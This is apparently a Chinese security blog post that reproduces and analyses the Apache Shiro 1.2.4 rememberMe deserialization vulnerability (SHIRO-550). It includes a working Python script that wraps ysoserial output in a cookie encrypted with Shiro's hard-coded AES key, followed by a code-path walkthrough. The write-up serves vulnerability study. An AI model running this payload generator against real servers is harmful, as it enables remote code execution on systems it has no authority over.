Shiro rememberMe 反序列化分析
Shiro 550
复现
1git clone https://github.com/apache/shiro.git
2git checkout shiro-root-1.2.4
然后导入maven项目之后,在samples/web/pom.xml配置jstl版本和反序列化用到的gadget链依赖。
1<properties>
2 <maven.compiler.source>1.6</maven.compiler.source>
3 <maven.compiler.target>1.6</maven.compiler.target>
4</properties>
5<dependency>
6 <groupId>javax.servlet</groupId>
7 <artifactId>jstl</artifactId>
8 <!-- 配置版本 -->
9 <version>1.2</version>
10 <scope>runtime</scope>
11</dependency>
12<!-- 依赖cc链 -->
13<dependency>
14 <groupId>org.apache.commons</groupId>
15 <artifactId>commons-collections4</artifactId>
16 <version>4.0</version>
17</dependency>
如果你爆了toolchains相关的错误,就在C:\Users\username\.m2\toolchains.xml配置toolchains
1<?xml version="1.0" encoding="UTF8"?>
2<toolchains>
3 <toolchain>
4 <type>jdk</type>
5 <provides>
6 <version>1.6</version>
7 <vendor>sun</vendor>
8 </provides>
9 <configuration>
10 <jdkHome>C:\Program Files\Java\jdk1.8.0_181</jdkHome>
11 </configuration>
12 </toolchain>
13</toolchains>
maven package之后将war包放到tomcat7下部署,运行之后就是这样
使用shiro_tool.jar复现:
也可以使用python脚本
1import sys
2import base64
3import uuid
4from random import Random
5import subprocess
6from Crypto.Cipher import AES
7
8def encode_rememberme(payload,command):
9 popen = subprocess.Popen(['java', '-jar', '../ysoserial/ysoserial-0.0.6-SNAPSHOT-all.jar', payload, command], stdout=subprocess.PIPE)
10 BS = AES.block_size
11 pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
12 key = "kPH+bIxk5D2deZiIxcaaaA=="
13 mode = AES.MODE_CBC
14 #iv = base64.b64decode(rememberMe)[:16]
15 iv = uuid.uuid4().bytes
16 print(iv)
17 encryptor = AES.new(base64.b64decode(key), mode, iv)
18 file_body = pad(popen.stdout.read())
19 base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
20 return base64_ciphertext
21
22if __name__ == '__main__':
23 print(sys.argv[1],sys.argv[2])
24 payload = encode_rememberme(sys.argv[1],sys.argv[2])
25 with open("payload.cookie", "w") as fpw:
26 print("rememberMe={}".format(payload.decode()), file=fpw)
将文件中的贴到cookie中请求即可。
分析
首先要知道shiro是一个用来做身份验证的框架,其原理是基于servlet的filter进行的。在web.xml中定义了ShiroFilter,作用范围是当前目录下所有的url
cookie的处理在CookieRememberMeManager类,继承了AbstractRememberMeManager,在AbstractRememberMeManager中硬编码了加密密钥DEFAULT_CIPHER_KEY_BYTES
加密方式为AES对称加密,AES有了密钥还需要加密算法和初始化向量IV,AbstractRememberMeManager中加密函数调用了CipherService接口,实现其方法的是JcaCipherService类
在该类的encrypt()中发现IV自动生成,长度16个字节
并且加密模式为CBC
在encrypt中会先将IV写入
所以我们直接读原始cookie前16个字节获取。
最后一点就是在encrypt()中字节数组serialized在何处序列化和反序列化的?
serialized在convertPrincipalsToBytes()被赋值
可以看到是一个PrincipalCollection对象,而PrincipalCollection是一个接口,其实现类
仅有SimplePrincipalCollection实现了readObject,这也是反序列化的入口,但是在哪触发的?
在org.apache.shiro.mgt.AbstractRememberMeManager#deserialize中一步步跟进
最终找到了org.apache.shiro.io.DefaultSerializer#deserialize
到此为止
总结
因为AES硬编码的问题导致的RCE,自己对于加密与解密不是很了解,这方面有待学习。
参考
- https://xz.aliyun.com/t/6493
- https://xz.aliyun.com/t/7207
- https://paper.seebug.org/shiro-rememberme-1-2-4/
- https://issues.apache.org/jira/browse/SHIRO-550
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。